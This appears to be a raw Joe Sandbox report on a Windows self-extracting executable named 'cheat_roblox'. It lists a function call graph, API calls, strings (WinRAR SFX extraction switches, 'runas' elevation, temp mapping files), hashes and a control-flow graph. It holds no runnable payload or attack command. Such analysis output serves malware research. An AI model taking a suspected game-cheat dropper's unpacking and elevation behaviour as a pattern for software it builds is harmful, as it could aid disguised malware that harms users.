7ff6e7e218c2 27357 7ff6e7e2190d 27356->27357 27360 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27356->27360 27357->26996 27358 7ff6e7e11fa0 31 API calls 27358->27359 27359->27356 27359->27357 27359->27358 27361 7ff6e7e2193b 27360->27361 27363 7ff6e7e2870a 27362->27363 27364 7ff6e7e421d0 33 API calls 27363->27364 27365 7ff6e7e2872f 27364->27365 27366 7ff6e7e421d0 33 API calls 27365->27366 27367 7ff6e7e28759 27366->27367 27367->27308 27369 7ff6e7e1e627 27368->27369 27370 7ff6e7e1e62c BuildCatchObjectHelperInternal 27368->27370 27372 7ff6e7e11fa0 31 API calls 27369->27372 27371 7ff6e7e1e668 BuildCatchObjectHelperInternal 27370->27371 27373 7ff6e7e11fa0 31 API calls 27370->27373 27371->27310 27372->27370 27373->27371 27374->27317 27376 7ff6e7e272cc 8 API calls 27375->27376 27377 7ff6e7e23ee1 27376->27377 27378 7ff6e7e23f0f 27377->27378 27419 7ff6e7e240bc 27377->27419 27378->27327 27381 7ff6e7e23efa FindClose 27381->27378 27383 7ff6e7e1f598 _snwprintf 27382->27383 27445 7ff6e7e12950 27383->27445 27386 7ff6e7e1f5cc 27390 7ff6e7e1f5fc 27386->27390 27460 7ff6e7e133e4 27386->27460 27389 7ff6e7e1f5f8 27389->27390 27492 7ff6e7e13ad8 27389->27492 27711 7ff6e7e12c54 27390->27711 27397 7ff6e7e1f7cb 27502 7ff6e7e1f8a4 27397->27502 27399 7ff6e7e18d04 33 API calls 27400 7ff6e7e1f662 27399->27400 27731 7ff6e7e27918 48 API calls 2 library calls 27400->27731 27402 7ff6e7e1f677 27403 7ff6e7e23ec8 55 API calls 27402->27403 27412 7ff6e7e1f6ad 27403->27412 27405 7ff6e7e1f842 27405->27390 27523 7ff6e7e169f8 27405->27523 27534 7ff6e7e1f930 27405->27534 27410 7ff6e7e1f74d 27410->27397 27411 7ff6e7e1f89a 27410->27411 27413 7ff6e7e1f895 27410->27413 27415 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27411->27415 27412->27410 27412->27411 27414 7ff6e7e23ec8 55 API calls 27412->27414 27732 7ff6e7e27918 48 API calls 2 library calls 27412->27732 27417 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27413->27417 27414->27412 27416 7ff6e7e1f8a0 
27415->27416 27417->27411 27418->27339 27420 7ff6e7e240f9 FindFirstFileW 27419->27420 27421 7ff6e7e241d2 FindNextFileW 27419->27421 27424 7ff6e7e241f3 27420->27424 27425 7ff6e7e2411e 27420->27425 27423 7ff6e7e241e1 GetLastError 27421->27423 27421->27424 27444 7ff6e7e241c0 27423->27444 27426 7ff6e7e24211 27424->27426 27430 7ff6e7e120b0 33 API calls 27424->27430 27427 7ff6e7e26a0c 49 API calls 27425->27427 27432 7ff6e7e1129c 33 API calls 27426->27432 27429 7ff6e7e24144 27427->27429 27428 7ff6e7e42320 _handle_error 8 API calls 27431 7ff6e7e23ef4 27428->27431 27433 7ff6e7e24167 27429->27433 27434 7ff6e7e24148 FindFirstFileW 27429->27434 27430->27426 27431->27378 27431->27381 27435 7ff6e7e2423b 27432->27435 27433->27424 27437 7ff6e7e241af GetLastError 27433->27437 27438 7ff6e7e24314 27433->27438 27434->27433 27436 7ff6e7e28090 47 API calls 27435->27436 27439 7ff6e7e24249 27436->27439 27437->27444 27440 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27438->27440 27442 7ff6e7e2430f 27439->27442 27439->27444 27441 7ff6e7e2431a 27440->27441 27443 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27442->27443 27443->27438 27444->27428 27446 7ff6e7e1296c 27445->27446 27447 7ff6e7e286ec 33 API calls 27446->27447 27448 7ff6e7e1298d 27447->27448 27449 7ff6e7e12ac2 27448->27449 27450 7ff6e7e421d0 33 API calls 27448->27450 27733 7ff6e7e24d04 27449->27733 27452 7ff6e7e12ab0 27450->27452 27452->27449 27454 7ff6e7e191c8 35 API calls 27452->27454 27454->27449 27455 7ff6e7e22ca8 27459 7ff6e7e224c0 54 API calls 27455->27459 27456 7ff6e7e22cc1 27458 7ff6e7e22cc5 27456->27458 27747 7ff6e7e1b7e8 99 API calls 2 library calls 27456->27747 27458->27386 27459->27456 27486 7ff6e7e228d0 104 API calls 27460->27486 27461 7ff6e7e1344e 27462 7ff6e7e13674 27461->27462 27468 7ff6e7e13682 27461->27468 27748 7ff6e7e128a4 82 API calls 2 library calls 27462->27748 27463 7ff6e7e13431 __scrt_get_show_window_mode 27463->27461 27465 7ff6e7e13601 27463->27465 27483 7ff6e7e22bb0 101 API 
calls 27463->27483 27465->27389 27466 7ff6e7e169f8 141 API calls 27466->27468 27467 7ff6e7e134cc 27487 7ff6e7e228d0 104 API calls 27467->27487 27468->27465 27468->27466 27472 7ff6e7e1370c 27468->27472 27488 7ff6e7e22aa0 101 API calls 27468->27488 27469 7ff6e7e135cb 27469->27461 27470 7ff6e7e135d7 27469->27470 27470->27465 27474 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27470->27474 27471 7ff6e7e13740 27471->27465 27475 7ff6e7e1384d 27471->27475 27489 7ff6e7e22bb0 101 API calls 27471->27489 27472->27465 27472->27471 27749 7ff6e7e128a4 82 API calls 2 library calls 27472->27749 27477 7ff6e7e13891 27474->27477 27475->27465 27476 7ff6e7e120b0 33 API calls 27475->27476 27476->27465 27477->27389 27478 7ff6e7e134eb 27478->27469 27484 7ff6e7e22aa0 101 API calls 27478->27484 27479 7ff6e7e135a7 27479->27469 27490 7ff6e7e228d0 104 API calls 27479->27490 27480 7ff6e7e169f8 141 API calls 27481 7ff6e7e1378e 27480->27481 27481->27480 27482 7ff6e7e13803 27481->27482 27491 7ff6e7e22aa0 101 API calls 27481->27491 27485 7ff6e7e22aa0 101 API calls 27482->27485 27483->27467 27484->27479 27485->27475 27486->27463 27487->27478 27488->27468 27489->27481 27490->27469 27491->27481 27493 7ff6e7e13af9 27492->27493 27499 7ff6e7e13b55 27492->27499 27750 7ff6e7e13378 27493->27750 27495 7ff6e7e42320 _handle_error 8 API calls 27497 7ff6e7e13b67 27495->27497 27497->27397 27497->27399 27498 7ff6e7e13b6c 27500 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27498->27500 27499->27495 27501 7ff6e7e13b71 27500->27501 27977 7ff6e7e2886c 27502->27977 27504 7ff6e7e1f8ba 27981 7ff6e7e2ef60 GetSystemTime SystemTimeToFileTime 27504->27981 27507 7ff6e7e30994 27508 7ff6e7e40340 27507->27508 27509 7ff6e7e27df4 47 API calls 27508->27509 27510 7ff6e7e40373 27509->27510 27511 7ff6e7e2aae0 48 API calls 27510->27511 27512 7ff6e7e40387 27511->27512 27513 7ff6e7e2da98 48 API calls 27512->27513 27514 7ff6e7e40397 27513->27514 27515 7ff6e7e11fa0 31 API calls 27514->27515 27516 7ff6e7e403a2 
27515->27516 27990 7ff6e7e3fc68 27516->27990 27524 7ff6e7e16a0a 27523->27524 27525 7ff6e7e16a0e 27523->27525 27524->27405 27533 7ff6e7e22bb0 101 API calls 27525->27533 27526 7ff6e7e16a1b 27527 7ff6e7e16a3e 27526->27527 27528 7ff6e7e16a2f 27526->27528 28085 7ff6e7e15130 130 API calls 2 library calls 27527->28085 27528->27524 28002 7ff6e7e15e24 27528->28002 27531 7ff6e7e16a3c 27531->27524 28086 7ff6e7e1466c 82 API calls 27531->28086 27533->27526 27535 7ff6e7e1f978 27534->27535 27538 7ff6e7e1f9b0 27535->27538 27595 7ff6e7e1fa34 27535->27595 28208 7ff6e7e3612c 146 API calls 3 library calls 27535->28208 27537 7ff6e7e21189 27539 7ff6e7e2118e 27537->27539 27540 7ff6e7e211e1 27537->27540 27538->27537 27545 7ff6e7e1f9d0 27538->27545 27538->27595 27539->27595 28256 7ff6e7e1dd08 179 API calls 27539->28256 27540->27595 28257 7ff6e7e3612c 146 API calls 3 library calls 27540->28257 27541 7ff6e7e42320 _handle_error 8 API calls 27542 7ff6e7e211c4 27541->27542 27542->27405 27545->27595 28123 7ff6e7e19bb0 27545->28123 27547 7ff6e7e1fad6 28136 7ff6e7e25ef8 27547->28136 27595->27541 27712 7ff6e7e12c74 27711->27712 27713 7ff6e7e12c88 27711->27713 27712->27713 28342 7ff6e7e12d80 27712->28342 27714 7ff6e7e11fa0 31 API calls 27713->27714 27717 7ff6e7e12ca1 27714->27717 27730 7ff6e7e12d64 27717->27730 28372 7ff6e7e13090 31 API calls _invalid_parameter_noinfo_noreturn 27717->28372 27718 7ff6e7e12d08 28373 7ff6e7e13090 31 API calls _invalid_parameter_noinfo_noreturn 27718->28373 27720 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27722 7ff6e7e12d7c 27720->27722 27721 7ff6e7e12d14 27723 7ff6e7e11fa0 31 API calls 27721->27723 27724 7ff6e7e12d20 27723->27724 28374 7ff6e7e2878c 27724->28374 27730->27720 27731->27402 27732->27412 27734 7ff6e7e24d32 __scrt_get_show_window_mode 27733->27734 27743 7ff6e7e24bac 27734->27743 27736 7ff6e7e24d90 27737 7ff6e7e42320 _handle_error 8 API calls 27736->27737 27740 7ff6e7e12b32 27737->27740 27738 7ff6e7e24d54 27738->27736 27739 7ff6e7e24dae 
27738->27739 27741 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27739->27741 27740->27386 27740->27455 27742 7ff6e7e24db3 27741->27742 27744 7ff6e7e24c27 27743->27744 27746 7ff6e7e24c2f BuildCatchObjectHelperInternal 27743->27746 27745 7ff6e7e11fa0 31 API calls 27744->27745 27745->27746 27746->27738 27747->27458 27748->27465 27749->27471 27751 7ff6e7e13396 27750->27751 27752 7ff6e7e1339a 27750->27752 27751->27498 27751->27499 27756 7ff6e7e13294 27752->27756 27755 7ff6e7e22aa0 101 API calls 27755->27751 27757 7ff6e7e132bb 27756->27757 27759 7ff6e7e132f6 27756->27759 27758 7ff6e7e169f8 141 API calls 27757->27758 27762 7ff6e7e132db 27758->27762 27764 7ff6e7e16e74 27759->27764 27762->27755 27765 7ff6e7e16e95 27764->27765 27766 7ff6e7e169f8 141 API calls 27765->27766 27768 7ff6e7e1331d 27765->27768 27796 7ff6e7e2e808 27765->27796 27766->27765 27768->27762 27769 7ff6e7e13904 27768->27769 27804 7ff6e7e16a7c 27769->27804 27772 7ff6e7e1396a 27775 7ff6e7e13989 27772->27775 27776 7ff6e7e1399a 27772->27776 27773 7ff6e7e13a8a 27777 7ff6e7e42320 _handle_error 8 API calls 27773->27777 27837 7ff6e7e30d54 33 API calls 27775->27837 27781 7ff6e7e139ec 27776->27781 27782 7ff6e7e139a3 27776->27782 27780 7ff6e7e13a9e 27777->27780 27778 7ff6e7e13ab3 27783 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27778->27783 27780->27762 27839 7ff6e7e126b4 33 API calls BuildCatchObjectHelperInternal 27781->27839 27838 7ff6e7e30c80 33 API calls 27782->27838 27785 7ff6e7e13ab8 27783->27785 27791 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27785->27791 27786 7ff6e7e139b0 27788 7ff6e7e139c0 BuildCatchObjectHelperInternal 27786->27788 27792 7ff6e7e11fa0 31 API calls 27786->27792 27789 7ff6e7e11fa0 31 API calls 27788->27789 27795 7ff6e7e1394f 27789->27795 27790 7ff6e7e13a13 27840 7ff6e7e30ae8 34 API calls _invalid_parameter_noinfo_noreturn 27790->27840 27794 7ff6e7e13abe 27791->27794 27792->27788 27795->27773 27795->27778 27795->27785 27797 7ff6e7e2e811 
27796->27797 27799 7ff6e7e2e82b 27797->27799 27802 7ff6e7e1b664 RtlPcToFileHeader RaiseException _com_raise_error 27797->27802 27800 7ff6e7e2e845 SetThreadExecutionState 27799->27800 27803 7ff6e7e1b664 RtlPcToFileHeader RaiseException _com_raise_error 27799->27803 27802->27799 27803->27800 27805 7ff6e7e16a96 _snwprintf 27804->27805 27806 7ff6e7e16ae4 27805->27806 27807 7ff6e7e16ac4 27805->27807 27809 7ff6e7e16d4d 27806->27809 27813 7ff6e7e16b0f 27806->27813 27879 7ff6e7e128a4 82 API calls 2 library calls 27807->27879 27908 7ff6e7e128a4 82 API calls 2 library calls 27809->27908 27810 7ff6e7e16ad0 27812 7ff6e7e42320 _handle_error 8 API calls 27810->27812 27814 7ff6e7e1394b 27812->27814 27813->27810 27841 7ff6e7e31f94 27813->27841 27814->27772 27814->27795 27836 7ff6e7e12794 33 API calls __std_swap_ranges_trivially_swappable 27814->27836 27817 7ff6e7e16b85 27820 7ff6e7e16c2a 27817->27820 27835 7ff6e7e16b7b 27817->27835 27885 7ff6e7e28968 109 API calls 27817->27885 27818 7ff6e7e16b6e 27880 7ff6e7e128a4 82 API calls 2 library calls 27818->27880 27819 7ff6e7e16b80 27819->27817 27881 7ff6e7e140b0 27819->27881 27850 7ff6e7e24760 27820->27850 27826 7ff6e7e16c52 27827 7ff6e7e16cc7 27826->27827 27828 7ff6e7e16cd1 27826->27828 27854 7ff6e7e21794 27827->27854 27886 7ff6e7e31f20 27828->27886 27869 7ff6e7e31870 27835->27869 27836->27772 27837->27795 27838->27786 27839->27790 27840->27795 27842 7ff6e7e32056 std::bad_alloc::bad_alloc 27841->27842 27843 7ff6e7e31fc5 std::bad_alloc::bad_alloc 27841->27843 27844 7ff6e7e44078 _com_raise_error 2 API calls 27842->27844 27845 7ff6e7e44078 _com_raise_error 2 API calls 27843->27845 27846 7ff6e7e3200f std::bad_alloc::bad_alloc 27843->27846 27847 7ff6e7e16b59 27843->27847 27844->27843 27845->27846 27846->27847 27848 7ff6e7e44078 _com_raise_error 2 API calls 27846->27848 27847->27817 27847->27818 27847->27819 27849 7ff6e7e320a9 27848->27849 27851 7ff6e7e24780 27850->27851 27853 7ff6e7e2478a 27850->27853 27852 7ff6e7e421d0 33 API calls 
27851->27852 27852->27853 27853->27826 27855 7ff6e7e217be __scrt_get_show_window_mode 27854->27855 27909 7ff6e7e28a48 27855->27909 27870 7ff6e7e3188e 27869->27870 27872 7ff6e7e318a1 27870->27872 27929 7ff6e7e2e948 27870->27929 27874 7ff6e7e318d8 27872->27874 27925 7ff6e7e4236c 27872->27925 27878 7ff6e7e31a37 27874->27878 27936 7ff6e7e2a984 31 API calls _invalid_parameter_noinfo_noreturn 27874->27936 27875 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27876 7ff6e7e31ad0 27875->27876 27878->27875 27879->27810 27880->27835 27882 7ff6e7e140dd 27881->27882 27884 7ff6e7e140d7 __scrt_get_show_window_mode 27881->27884 27882->27884 27937 7ff6e7e14120 27882->27937 27884->27817 27885->27820 27887 7ff6e7e31f29 27886->27887 27888 7ff6e7e31f5d 27887->27888 27889 7ff6e7e31f55 27887->27889 27890 7ff6e7e31f49 27887->27890 27908->27810 27926 7ff6e7e4239f 27925->27926 27927 7ff6e7e423c8 27926->27927 27928 7ff6e7e31870 108 API calls 27926->27928 27927->27874 27928->27926 27930 7ff6e7e2ecd8 103 API calls 27929->27930 27931 7ff6e7e2e95f ReleaseSemaphore 27930->27931 27932 7ff6e7e2e984 27931->27932 27933 7ff6e7e2e9a3 DeleteCriticalSection CloseHandle CloseHandle 27931->27933 27934 7ff6e7e2ea5c 101 API calls 27932->27934 27936->27878 27940 7ff6e7e14149 27937->27940 27942 7ff6e7e14168 __std_swap_ranges_trivially_swappable __scrt_get_show_window_mode 27937->27942 27938 7ff6e7e12018 33 API calls 27939 7ff6e7e141eb 27938->27939 27941 7ff6e7e421d0 33 API calls 27940->27941 27940->27942 27941->27942 27942->27938 27978 7ff6e7e28892 27977->27978 27979 7ff6e7e28882 27977->27979 27978->27504 27984 7ff6e7e223f0 27979->27984 27982 7ff6e7e42320 _handle_error 8 API calls 27981->27982 27983 7ff6e7e1f7dc 27982->27983 27983->27405 27983->27507 27985 7ff6e7e2240f 27984->27985 27988 7ff6e7e22aa0 101 API calls 27985->27988 27986 7ff6e7e22428 27989 7ff6e7e22bb0 101 API calls 27986->27989 27987 7ff6e7e22438 27987->27978 27988->27986 27989->27987 27991 7ff6e7e3fc94 27990->27991 27992 7ff6e7e1129c 
33 API calls 27991->27992 27993 7ff6e7e3fca4 27992->27993 28004 7ff6e7e15e67 28002->28004 28003 7ff6e7e16084 28087 7ff6e7e285f0 28003->28087 28004->28003 28005 7ff6e7e15ea5 28004->28005 28013 7ff6e7e15eb7 28004->28013 28097 7ff6e7e128a4 82 API calls 2 library calls 28005->28097 28008 7ff6e7e16134 28104 7ff6e7e16fcc 82 API calls 28008->28104 28010 7ff6e7e15eb2 28012 7ff6e7e169af 28010->28012 28018 7ff6e7e169e4 28010->28018 28028 7ff6e7e169ef 28010->28028 28011 7ff6e7e15f44 28099 7ff6e7e16d88 82 API calls 28011->28099 28016 7ff6e7e42320 _handle_error 8 API calls 28012->28016 28013->28008 28013->28011 28098 7ff6e7e16f38 33 API calls BuildCatchObjectHelperInternal 28013->28098 28014 7ff6e7e1612e 28014->28008 28020 7ff6e7e16973 28014->28020 28027 7ff6e7e285f0 104 API calls 28014->28027 28019 7ff6e7e169c3 28016->28019 28021 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 28018->28021 28019->27531 28020->28010 28024 7ff6e7e169e9 28021->28024 28025 7ff6e7e16034 28025->28003 28029 7ff6e7e4236c 108 API calls 28025->28029 28032 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 28028->28032 28034 7ff6e7e169f5 28032->28034 28035 7ff6e7e16097 28103 7ff6e7e1433c 82 API calls 2 library calls 28035->28103 28038 7ff6e7e15f5d 28038->28025 28038->28035 28100 7ff6e7e1433c 82 API calls 2 library calls 28038->28100 28101 7ff6e7e16d88 82 API calls 28038->28101 28102 7ff6e7e1a1a0 109 API calls _handle_error 28038->28102 28085->27531 28088 7ff6e7e2869a 28087->28088 28089 7ff6e7e28614 28087->28089 28090 7ff6e7e140b0 33 API calls 28088->28090 28094 7ff6e7e2867c 28088->28094 28091 7ff6e7e140b0 33 API calls 28089->28091 28089->28094 28092 7ff6e7e286b3 28090->28092 28093 7ff6e7e2864d 28091->28093 28096 7ff6e7e228d0 104 API calls 28092->28096 28094->28014 28096->28094 28097->28010 28099->28038 28100->28038 28101->28038 28102->28038 28104->28010 28131 7ff6e7e19be7 28123->28131 28124 7ff6e7e19c1b 28125 7ff6e7e42320 _handle_error 8 API calls 28124->28125 28126 7ff6e7e19c9d 
28125->28126 28126->27547 28128 7ff6e7e19c83 28130 7ff6e7e11fa0 31 API calls 28128->28130 28130->28124 28131->28124 28131->28128 28132 7ff6e7e19cae 28131->28132 28258 7ff6e7e25294 28131->28258 28276 7ff6e7e2db60 28131->28276 28133 7ff6e7e19cbf 28132->28133 28280 7ff6e7e2da48 CompareStringW 28132->28280 28133->28128 28135 7ff6e7e120b0 33 API calls 28133->28135 28135->28128 28149 7ff6e7e25f3a 28136->28149 28137 7ff6e7e2619b 28138 7ff6e7e261ce 28142 7ff6e7e1129c 33 API calls 28149->28137 28149->28138 28149->28142 28208->27538 28256->27595 28257->27595 28259 7ff6e7e252d4 28258->28259 28263 7ff6e7e25312 __vcrt_InitializeCriticalSectionEx 28259->28263 28269 7ff6e7e25339 __vcrt_InitializeCriticalSectionEx 28259->28269 28281 7ff6e7e313f4 CompareStringW 28259->28281 28260 7ff6e7e42320 _handle_error 8 API calls 28262 7ff6e7e25503 28260->28262 28262->28131 28265 7ff6e7e25382 __vcrt_InitializeCriticalSectionEx 28263->28265 28263->28269 28282 7ff6e7e313f4 CompareStringW 28263->28282 28266 7ff6e7e1129c 33 API calls 28265->28266 28267 7ff6e7e25439 28265->28267 28265->28269 28268 7ff6e7e25426 28266->28268 28270 7ff6e7e25489 28267->28270 28272 7ff6e7e2551b 28267->28272 28271 7ff6e7e272cc 8 API calls 28268->28271 28269->28260 28270->28269 28283 7ff6e7e313f4 CompareStringW 28270->28283 28271->28267 28274 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 28272->28274 28277 7ff6e7e2db73 28276->28277 28278 7ff6e7e120b0 33 API calls 28277->28278 28279 7ff6e7e2db91 28277->28279 28278->28279 28279->28131 28280->28133 28281->28263 28282->28265 28283->28269 28343 7ff6e7e12da5 28342->28343 28345 7ff6e7e13025 28343->28345 28388 7ff6e7e2b7e4 31 API calls _invalid_parameter_noinfo_noreturn 28343->28388 28346 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 28345->28346 28347 7ff6e7e13045 28346->28347 28348 7ff6e7e4236c 108 API calls 28347->28348 28349 7ff6e7e1306f 28348->28349 28351 7ff6e7e4236c 108 API calls 28349->28351 28350 7ff6e7e12dfa 28350->28345 28353 7ff6e7e11fa0 
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmapWindow
                                                                                                                  • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                                                                  • API String ID: 3303814210-2702805183
                                                                                                                  • Opcode ID: 0e8d890bdde75d6605bcec53c920d417cd8344987430ee63e9d897233e2217a9
                                                                                                                  • Instruction ID: d991e0f0a39ec86cf976a5c6969d83b99ff5027bc9dbf25398c341d14eb0bcb3
                                                                                                                  • Opcode Fuzzy Hash: 0e8d890bdde75d6605bcec53c920d417cd8344987430ee63e9d897233e2217a9
                                                                                                                  • Instruction Fuzzy Hash: 14D2C063A0878391EA20DB25E8553F96361EF86780F404135DAED876F6EF3EE544C34A
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$ButtonCheckedFileMove$DialogItemPathTemp
                                                                                                                  • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                                                  • API String ID: 1830998149-3916287355
                                                                                                                  • Opcode ID: 24401d00356af0f8a2b66be03998f7c7698b069a38d94f1f9b1c3a1823484afa
                                                                                                                  • Instruction ID: ed255d8ee097e70cb18af74df1ab62e6491f4476e7fe838748a5084d6a28abfb
                                                                                                                  • Opcode Fuzzy Hash: 24401d00356af0f8a2b66be03998f7c7698b069a38d94f1f9b1c3a1823484afa
                                                                                                                  • Instruction Fuzzy Hash: D213CE23B04B8299EB10DF64D8843EC27B1EB54398F400535DAAD97AE9DF3DE585C34A

                                                                                                                  Similarity
                                                                                                                  • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                  • API String ID: 1048086575-3710569615
                                                                                                                  • Opcode ID: 698fae3a653e1b7d4e45f88450a095eb1b46b52804e719b722bb591d7123fd6d
                                                                                                                  • Instruction ID: 135e7869471a50ba68675d3e0b263a1aaf0e998f4138604745d598e815b9da23
                                                                                                                  • Opcode Fuzzy Hash: 698fae3a653e1b7d4e45f88450a095eb1b46b52804e719b722bb591d7123fd6d
                                                                                                                  • Instruction Fuzzy Hash: BB12B823A18B8281EB10DB24F8453797361FF84794F404231DAED87AA6EF3EE545D74A

                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                                                                                                                  • String ID: $%s:$CAPTION
                                                                                                                  • API String ID: 1936833115-404845831
                                                                                                                  • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                                                  • Instruction ID: 299b9d234ee4823aa01a5f2bac5cee68a71e2949f4095b412d07f58385e6738d
                                                                                                                  • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                                                  • Instruction Fuzzy Hash: 8F91F733B1868286E718CF29E80476AA7A1FB84784F505535EE9D97B98DF3DE805CB04

                                                                                                                  Similarity
                                                                                                                  • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                                                  • String ID: PNG
                                                                                                                  • API String ID: 541704414-364855578
                                                                                                                  • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                                                  • Instruction ID: 448487534cd5bfea93cfc74a2b28d10ce0613cb3f897d064cd80a122a0e79218
                                                                                                                  • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                                                  • Instruction Fuzzy Hash: 81418427A09B0691EF048B26E44437967A1BF88BD1F040435DDADC73A4EF7EE445C396
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID: __tmp_reference_source_
                                                                                                                  • API String ID: 3668304517-685763994
                                                                                                                  • Opcode ID: c76355c9baf2e66e4a3ef320a7fc713a0968ab52b41ecee3f9f8e165b183ab49
                                                                                                                  • Instruction ID: 53d7fe03d816f7904e34d04aa3597797a9d8495b17f629e2266e3a0192787114
                                                                                                                  • Opcode Fuzzy Hash: c76355c9baf2e66e4a3ef320a7fc713a0968ab52b41ecee3f9f8e165b183ab49
                                                                                                                  • Instruction Fuzzy Hash: BEE2B363A096C292EA64CB25E1413FE6761FB81784F404132DBED83AE5CF3EE555C70A
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID: CMT
                                                                                                                  • API String ID: 3668304517-2756464174
                                                                                                                  • Opcode ID: 1de83cc682e1a1985b3aba301812ad60c5dac5995a71caddbb8804aac8f80fc4
                                                                                                                  • Instruction ID: a5205434f7802f94aa2f653702adc380cdf3c6912b64036c47a5aaed7c614924
                                                                                                                  • Opcode Fuzzy Hash: 1de83cc682e1a1985b3aba301812ad60c5dac5995a71caddbb8804aac8f80fc4
                                                                                                                  • Instruction Fuzzy Hash: 13E20F23B0868286EB18DB74D4523FE67A1FB45784F400035DAAE87796DF3EE459C34A

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 3478 7ff6e7e240bc-7ff6e7e240f3 3479 7ff6e7e240f9-7ff6e7e24101 3478->3479 3480 7ff6e7e241d2-7ff6e7e241df FindNextFileW 3478->3480 3481 7ff6e7e24106-7ff6e7e24118 FindFirstFileW 3479->3481 3482 7ff6e7e24103 3479->3482 3483 7ff6e7e241e1-7ff6e7e241f1 GetLastError 3480->3483 3484 7ff6e7e241f3-7ff6e7e241f6 3480->3484 3481->3484 3485 7ff6e7e2411e-7ff6e7e24146 call 7ff6e7e26a0c 3481->3485 3482->3481 3486 7ff6e7e241ca-7ff6e7e241cd 3483->3486 3487 7ff6e7e241f8-7ff6e7e24200 3484->3487 3488 7ff6e7e24211-7ff6e7e24253 call 7ff6e7e4797c call 7ff6e7e1129c call 7ff6e7e28090 3484->3488 3500 7ff6e7e24167-7ff6e7e24170 3485->3500 3501 7ff6e7e24148-7ff6e7e24164 FindFirstFileW 3485->3501 3489 7ff6e7e242eb-7ff6e7e2430e call 7ff6e7e42320 3486->3489 3491 7ff6e7e24202 3487->3491 3492 7ff6e7e24205-7ff6e7e2420c call 7ff6e7e120b0 3487->3492 3514 7ff6e7e2428c-7ff6e7e242e6 call 7ff6e7e2f168 * 3 3488->3514 3515 7ff6e7e24255-7ff6e7e2426c 3488->3515 3491->3492 3492->3488 3503 7ff6e7e241a9-7ff6e7e241ad 3500->3503 3504 7ff6e7e24172-7ff6e7e24189 3500->3504 3501->3500 3503->3484 3506 7ff6e7e241af-7ff6e7e241be GetLastError 3503->3506 3507 7ff6e7e2418b-7ff6e7e2419e 3504->3507 3508 7ff6e7e241a4 call 7ff6e7e4220c 3504->3508 3512 7ff6e7e241c8 3506->3512 3513 7ff6e7e241c0-7ff6e7e241c6 3506->3513 3507->3508 3509 7ff6e7e24315-7ff6e7e2431b call 7ff6e7e47904 3507->3509 3508->3503 3512->3486 3513->3486 3513->3512 3514->3489 3517 7ff6e7e24287 call 7ff6e7e4220c 3515->3517 3518 7ff6e7e2426e-7ff6e7e24281 3515->3518 3517->3514 